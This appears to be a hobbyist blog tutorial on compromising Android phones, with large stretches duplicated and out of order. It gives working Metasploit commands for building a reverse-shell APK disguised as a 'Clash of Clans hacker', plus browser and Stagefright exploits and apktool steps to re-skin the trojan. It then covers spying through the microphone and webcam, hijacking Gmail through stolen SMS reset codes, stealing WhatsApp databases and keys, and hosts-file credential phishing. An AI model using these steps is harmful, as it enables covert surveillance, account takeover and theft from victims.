Hi,
Topay the long expected big-android-hacking-guide article. As you may know I'm writing this article to ofset my droidjack aricle I heard manny complaints about. Whatever, today I'm going to show you the huge impact metasploit and other opensource tools can have. But ... Lets Begin!
In the 1st part I will show you how to build the payloads to gain acces to your targets phone
Let's say we want to pwn script kiddies (Always funny :p )....
If you are using a newer version of metasploit I advice you to go to the next method.
Fire up your console and type this : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.X.X LPORT=443 R > clash_of_clans_hacker.apk
Your apk will be stored in the root directionary.
msfvenom -p android/shell/reverse_tcp LHOST=192.168.x.x LPORT=443 R> /root/clash_of_clans_hacker.apk
-8. rootsector exploits [msf+apache+ettercap+priv8.sh]
------------------------------------------------------------------------------
-24. Android exploit [android backdoor]
------------------------------------------------------------------------------
Your output should look like this:
Payload [APK] Final Config:
===========================
LHOST : 192.168.1.14
LPORT : 443
FILENAME : clashofclansh_hacker.apk
STORAGE IN : /root/opensource/priv8/clashofclansh_hacker.apk
PAYLOAD : android/meterpreter/reverse_tcp
AFFECTED SYSTEMS : Android OS
An new XTerm window with a meterpreter shell will pop up and your payload is generating. It will be stored in the folder /root/opensource/priv8 (The folder all your netool.sh output files are stored)
Start the metasploit console with: msfconsole
and select the exploit with: use exploit/android/browser/webview_addjavascriptinterface
Configure all the options: set LHOST 192.168.x.x, set LPORT 443
And set the utipath to clash_of_clans_hack_download: set URIPATH /DOWNLOAD CLASH_OF_CLANS_HACKER
And just run it with: exploit
open the msfconsole again: msfconsole
And select this exploit: use exploit/android/browser/samsung_knox_smdm_url
Configure the exploit with: set LHOST 192.168.x.x,set URIPATH /clash_of_clans_hacker_download, set SRVPORT 443
and run it with: exploit -j
You can send it over MMS or just find a way to get the .mp4 output file on your targets device. For safety reasons Zimperium realeased a version only working on google nexus devices. run the file with: python stagefrigt.py -c 192.168.x.x -c 443 -o How_to_Hack_Clash_of_Clans.mp4
Okay now we've created out app, but... NOBODY is going to download it. The reason for this is becous the app doesn't really look like a fancy-(useless)magic-'powerfull'-100%working clash of clans hacker that can make you rule the world (muhahahaha).
The appicon the metasploit logo or a stupid laughing head. If our victim installed our app the name of the app is MainActivity and not 'fancy-(useless)magic-'powerfull'-100%working clash of clans hacker that can make you rule the world'
Another problem are the permissions.
In some cases you want to do some special (spear) phishing operations. Let's say you want somebody to install your (fake) camera app, It may arouse suspicion at your target if the app also wants acces to your victim if it also wants acces to your sms and phone data o_0
I'ts really easy to customize our app. The tool we're going to use is called APKTOOL. It's installed in kali by default but it isn't working (like most kali tools) so make sure you run it under another distro or under windows.
The arguments are really simple: apktool d clash_of_clans_hacker.apk
d is for decompile mode and the last parameter is for the app name obviously.
Okay lets go into the decrypted app folder. Open it and you see there are a few files . The file we want to edit now is the AndroidManifest.xml file. Open it with notepad, leaf or whatever editor you want.
Okay first of all change this line: <application android:label="@string/app_name">
in <application android:label="Clash_Of_Clans_Hacker">
and: <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
in <activity android:label="Clash_Of_Clans_Hacker" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
Cool. Let's have a look at the permissions. As I've said you can fully customize them. For the following hacks we want to write things to the disk so add:
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
just paste under the other permissions and go to the nex step.
The cool things about this permissions is that you can add or remove as much as
you want. Now you can a kinda shop them however most of them will be useless.
This is the list of all possible permissions
Topay the long expected big-android-hacking-guide article. As you may know I'm writing this article to ofset my droidjack aricle I heard manny complaints about. Whatever, today I'm going to show you the huge impact metasploit and other opensource tools can have. But ... Lets Begin!
- Exploitation...
In the 1st part I will show you how to build the payloads to gain acces to your targets phone
Let's say we want to pwn script kiddies (Always funny :p )....
- MSFPAYLOAD
If you are using a newer version of metasploit I advice you to go to the next method.
Fire up your console and type this : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.X.X LPORT=443 R > clash_of_clans_hacker.apk
Your apk will be stored in the root directionary.
- MSFVENOM
msfvenom -p android/shell/reverse_tcp LHOST=192.168.x.x LPORT=443 R> /root/clash_of_clans_hacker.apk
- NETOOL.SH
-8. rootsector exploits [msf+apache+ettercap+priv8.sh]
------------------------------------------------------------------------------
-24. Android exploit [android backdoor]
------------------------------------------------------------------------------
Your output should look like this:
Payload [APK] Final Config:
===========================
LHOST : 192.168.1.14
LPORT : 443
FILENAME : clashofclansh_hacker.apk
STORAGE IN : /root/opensource/priv8/clashofclansh_hacker.apk
PAYLOAD : android/meterpreter/reverse_tcp
AFFECTED SYSTEMS : Android OS
An new XTerm window with a meterpreter shell will pop up and your payload is generating. It will be stored in the folder /root/opensource/priv8 (The folder all your netool.sh output files are stored)
- Android Browser and WebView addJavascriptInterface Code Execution
Start the metasploit console with: msfconsole
and select the exploit with: use exploit/android/browser/webview_addjavascriptinterface
Configure all the options: set LHOST 192.168.x.x, set LPORT 443
And set the utipath to clash_of_clans_hack_download: set URIPATH /DOWNLOAD CLASH_OF_CLANS_HACKER
And just run it with: exploit
- SAMSUNG KNOX
open the msfconsole again: msfconsole
And select this exploit: use exploit/android/browser/samsung_knox_smdm_url
Configure the exploit with: set LHOST 192.168.x.x,set URIPATH /clash_of_clans_hacker_download, set SRVPORT 443
and run it with: exploit -j
- STAGEFRIGHT
You can send it over MMS or just find a way to get the .mp4 output file on your targets device. For safety reasons Zimperium realeased a version only working on google nexus devices. run the file with: python stagefrigt.py -c 192.168.x.x -c 443 -o How_to_Hack_Clash_of_Clans.mp4
- Social Engenering...
Okay now we've created out app, but... NOBODY is going to download it. The reason for this is becous the app doesn't really look like a fancy-(useless)magic-'powerfull'-100%working clash of clans hacker that can make you rule the world (muhahahaha).
The appicon the metasploit logo or a stupid laughing head. If our victim installed our app the name of the app is MainActivity and not 'fancy-(useless)magic-'powerfull'-100%working clash of clans hacker that can make you rule the world'
Another problem are the permissions.
In some cases you want to do some special (spear) phishing operations. Let's say you want somebody to install your (fake) camera app, It may arouse suspicion at your target if the app also wants acces to your victim if it also wants acces to your sms and phone data o_0
I'ts really easy to customize our app. The tool we're going to use is called APKTOOL. It's installed in kali by default but it isn't working (like most kali tools) so make sure you run it under another distro or under windows.
The arguments are really simple: apktool d clash_of_clans_hacker.apk
d is for decompile mode and the last parameter is for the app name obviously.
Okay lets go into the decrypted app folder. Open it and you see there are a few files . The file we want to edit now is the AndroidManifest.xml file. Open it with notepad, leaf or whatever editor you want.
Okay first of all change this line: <application android:label="@string/app_name">
in <application android:label="Clash_Of_Clans_Hacker">
and: <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
in <activity android:label="Clash_Of_Clans_Hacker" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
Cool. Let's have a look at the permissions. As I've said you can fully customize them. For the following hacks we want to write things to the disk so add:
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
just paste under the other permissions and go to the nex step.
The cool things about this permissions is that you can add or remove as much as
you want. Now you can a kinda shop them however most of them will be useless.
This is the list of all possible permissions
permission_shop.txt |
As I said this Application uses the metasploit logo as appicon. Becouse this could mess up your attack we have to change it.
So we're going back to our <application android:label="Clash_Of_Clans_Hacker"> line and
change it into this: <application android:label="Clash_Of_Clans_Hacker",android.icon="@drawable/icon" >
Okay now let's close (AND SAVE !) this file and move to the res (resources) folder.
There is only 1 folder but we need 3 new folders with the icons for the different resolutions.
The names of the folders are
The image files must be png, so let's go to google images and search for clashofclans icon png.
Than go to: search tools > size > exactly and then the with and the height ( 36x36,48x48 and 72x72)
SAVE THE PICTURES AS icon.png in your folders!
Nice, now we succesfully rebuilded our app, now recompile it.
Go back to the terminal and recompile it with the command: apktool b app -o clash_of_clans_hacker.apk
B for build mode and o for output file.
Amazing now we got our advanced apkt trojan generated :)
open another msfconsole and
connect back to your payload with:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 443
exploit
Congratiulations! Now you've got a meterpreter shell.
This is the part where most tutorials leave you alone. But not this one!
There are some cool commands specially made for android android like:
spy spy :)
--------------record_mic
webcam_chat
webcam_list
webcam_snap
webcam_stream
dump_callog
dumb_contacts
dubs_sms
geolocate
check_root
---(not specially for android)---
upload
download
shell
sysinfo
find
and becouse android is actually unix most normal meterpreter
comands also work :)
This is the part where most youtube videos leave you alone. But to show you how powerfull this session can be I will show you a few excample.
the only disadvantage of this method is: if your targets phone aint rooted you cant remove the message and you will be discovered.
Okay really cool. Like with droidjack you can hack whatsapp and read your victims messages. In this case your targets phone must be rooted. To check if this is the case run: check_root
First let me tell you the difference between the meterpreter shell and the real android shell. With the meterpreter shell you can do really cool thing. I think it translates its commands into commands readable for the android shell but whatever. The android shell is a fully linux shell. You can execute linux commands and bash scripts. I know it's verry confusing but I will mark the different actions in the different shells with colors
Okay then type in your meterpreter shell the command: shell(this will spawn a shell).let's move to your victims root dir with: cd /
Then to the whatsapp folder with: cd /sdcard/WhatsApp
There are 5 files: .Shared, .trash, Databases, Media and Profile Pictures
Move into the database with: cd Database and download it with: download msgstore.db.crypt8 /root
This is sad for us becouse we can't do anything with this file since it's encrypted with crypt8.
The way to make the files readable is to download key.
The key file stores two sets of decryption keys, the actual encryption key: K and an initialation vector called IV. Whatsapp stores these files in a secured location. We can only acces them if we are root. To actually claim our root acces we need to run the command: sudo su
This could be a problem if your target hasn't installed supersu or other applications 're managing the root acces but you can fix this with some social engeneering.
Now let's type in this command of series: cd /
cd /data/data
cd com.whatsapp
cd files
cp key /sdcard/Download
then terminate the shell with exit.
Dive back into your meterpreter shell with: shell -i 1 (If this is your android session)
than execute again some commands: cd /; cd /sdcard/Download;download key;rm key
okay now you got the encrypted file and the key :)
If we want to decrypt it and see the messages we can do it with 2 programs/scripts
---linux
---Windows
Oh and by the way, the linux script is a little bit buggy so if it is not working try to run the windows program with wine.
Okay that was really cool but how great would it be if we coud be a man in the middle without arpspoofing or something. The good news is that it's possible :) The bad news is that we also need root acces for this hack. But nevermind let's begin.
The way this work's is really easy, becouse android is linux it got a hosts(.txt) file. This method is also used by people who wants to block adds without adblocker apps. What they're doing is this: After every fancy website name like www.ddosdipdye.weebly.com is an sever IP hidden. You can tell android, hey if you are visiting www.ddosdipye.weebly.com don't go to the real ip behind this website but go for instance to the localhost (The android localhost is blocked by default so you won't see anything). We are are also going to replace the server IP but then with our malicious websites... This sounds really insignificant and meaningless but it's really simple.
For this attack you need the SEToolkit or another phisher...
-The Website Attack Vectors and Enter
-The Credential Harvester Attack and Enter
-The custom attack
-Fill in your IP adress and the site you want to clone (in this case twitter)
(mobile login link = https://mobile.twitter.com/session/new )
If the command cat hosts returns 192.168.x.x mobile.twitter.com/session/new move back to your setoolkit window and wait until your target visits twitter and grab his credentials. You can add as much fake phishing links to the host files (SEPERATE THEM WITH ENTER). The big disadvantage of this attack is this: If you target don't trust this sittuation he(or she) can decide to ping the host. With this command they will see that the IP adress of the site they are searching for does not match with the real IP adress.
Okay the only thing you have to do now is to get the link app or .mp4 file on your victim's android device. Use your creativity and imagination. Read some social engeneering books and you will rule the (android) world :)
ps: If you got root acces and if you want to do some reaserch by yourself, this are some usefull locations to explore your victims device.
/data/data/com.android.chrome
/data/data/com.android.contacts
/data/data/com.android.browser
/storage/sdcard0/Download
/storage/sdcard0/Pictures
/storage/sdcard0/Screenshot
/storage/sdcar0/Ringtones
/storage/sdcard0/Android/data
By
@ClaimItToYou
So we're going back to our <application android:label="Clash_Of_Clans_Hacker"> line and
change it into this: <application android:label="Clash_Of_Clans_Hacker",android.icon="@drawable/icon" >
Okay now let's close (AND SAVE !) this file and move to the res (resources) folder.
There is only 1 folder but we need 3 new folders with the icons for the different resolutions.
The names of the folders are
- drawable-ldpi-v4
- drawable-mdpi-v4
- drawable-hdpi-v4
The image files must be png, so let's go to google images and search for clashofclans icon png.
Than go to: search tools > size > exactly and then the with and the height ( 36x36,48x48 and 72x72)
SAVE THE PICTURES AS icon.png in your folders!
Nice, now we succesfully rebuilded our app, now recompile it.
Go back to the terminal and recompile it with the command: apktool b app -o clash_of_clans_hacker.apk
B for build mode and o for output file.
Amazing now we got our advanced apkt trojan generated :)
open another msfconsole and
connect back to your payload with:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 443
exploit
- POST EXPLOITATION...
Congratiulations! Now you've got a meterpreter shell.
This is the part where most tutorials leave you alone. But not this one!
There are some cool commands specially made for android android like:
spy spy :)
--------------record_mic
webcam_chat
webcam_list
webcam_snap
webcam_stream
dump_callog
dumb_contacts
dubs_sms
geolocate
check_root
---(not specially for android)---
upload
download
shell
sysinfo
find
and becouse android is actually unix most normal meterpreter
comands also work :)
This is the part where most youtube videos leave you alone. But to show you how powerfull this session can be I will show you a few excample.
- hack sms-recovery enabled accounts...
- Go to gmail and enter your victims email adress and click "Need Help?","I don know my password" and then "a text message (SMS)"
- Go back to your meterpretter shell and type: dumb_sms Now the victims SMS file will be downloaded to your root dir. Open it and now you can see the SMS verification code google sended to your victims number.
- Copy the code enter it and resset the password.
- log in with your new password
- PWNED
the only disadvantage of this method is: if your targets phone aint rooted you cant remove the message and you will be discovered.
- Hack whatsapp local database...
Okay really cool. Like with droidjack you can hack whatsapp and read your victims messages. In this case your targets phone must be rooted. To check if this is the case run: check_root
First let me tell you the difference between the meterpreter shell and the real android shell. With the meterpreter shell you can do really cool thing. I think it translates its commands into commands readable for the android shell but whatever. The android shell is a fully linux shell. You can execute linux commands and bash scripts. I know it's verry confusing but I will mark the different actions in the different shells with colors
Okay then type in your meterpreter shell the command: shell(this will spawn a shell).let's move to your victims root dir with: cd /
Then to the whatsapp folder with: cd /sdcard/WhatsApp
There are 5 files: .Shared, .trash, Databases, Media and Profile Pictures
Move into the database with: cd Database and download it with: download msgstore.db.crypt8 /root
This is sad for us becouse we can't do anything with this file since it's encrypted with crypt8.
The way to make the files readable is to download key.
The key file stores two sets of decryption keys, the actual encryption key: K and an initialation vector called IV. Whatsapp stores these files in a secured location. We can only acces them if we are root. To actually claim our root acces we need to run the command: sudo su
This could be a problem if your target hasn't installed supersu or other applications 're managing the root acces but you can fix this with some social engeneering.
Now let's type in this command of series: cd /
cd /data/data
cd com.whatsapp
cd files
cp key /sdcard/Download
then terminate the shell with exit.
Dive back into your meterpreter shell with: shell -i 1 (If this is your android session)
than execute again some commands: cd /; cd /sdcard/Download;download key;rm key
okay now you got the encrypted file and the key :)
If we want to decrypt it and see the messages we can do it with 2 programs/scripts
---linux
---Windows
Oh and by the way, the linux script is a little bit buggy so if it is not working try to run the windows program with wine.
- Man In The Middle
Okay that was really cool but how great would it be if we coud be a man in the middle without arpspoofing or something. The good news is that it's possible :) The bad news is that we also need root acces for this hack. But nevermind let's begin.
The way this work's is really easy, becouse android is linux it got a hosts(.txt) file. This method is also used by people who wants to block adds without adblocker apps. What they're doing is this: After every fancy website name like www.ddosdipdye.weebly.com is an sever IP hidden. You can tell android, hey if you are visiting www.ddosdipye.weebly.com don't go to the real ip behind this website but go for instance to the localhost (The android localhost is blocked by default so you won't see anything). We are are also going to replace the server IP but then with our malicious websites... This sounds really insignificant and meaningless but it's really simple.
For this attack you need the SEToolkit or another phisher...
- Run the commands: service apache2 start and service postgresql start
- Startup the SEToolkit and select the following menues
-The Website Attack Vectors and Enter
-The Credential Harvester Attack and Enter
-The custom attack
-Fill in your IP adress and the site you want to clone (in this case twitter)
(mobile login link = https://mobile.twitter.com/session/new )
- Okay great now we got our IP as a phishing server. Let's create a new file on our meterpreter-running box call it hosts and paste this into it: 192.168.x.x mobile.twitter.com/session/new
- okay save and close this file and dive back into your session and run: shell. When you're in your meterpreter shell type cd /; cd /system/etc; rm hosts; upload hosts \system\etc; cat hosts
If the command cat hosts returns 192.168.x.x mobile.twitter.com/session/new move back to your setoolkit window and wait until your target visits twitter and grab his credentials. You can add as much fake phishing links to the host files (SEPERATE THEM WITH ENTER). The big disadvantage of this attack is this: If you target don't trust this sittuation he(or she) can decide to ping the host. With this command they will see that the IP adress of the site they are searching for does not match with the real IP adress.
Okay the only thing you have to do now is to get the link app or .mp4 file on your victim's android device. Use your creativity and imagination. Read some social engeneering books and you will rule the (android) world :)
ps: If you got root acces and if you want to do some reaserch by yourself, this are some usefull locations to explore your victims device.
/data/data/com.android.chrome
/data/data/com.android.contacts
/data/data/com.android.browser
/storage/sdcard0/Download
/storage/sdcard0/Pictures
/storage/sdcard0/Screenshot
/storage/sdcar0/Ringtones
/storage/sdcard0/Android/data
By
@ClaimItToYou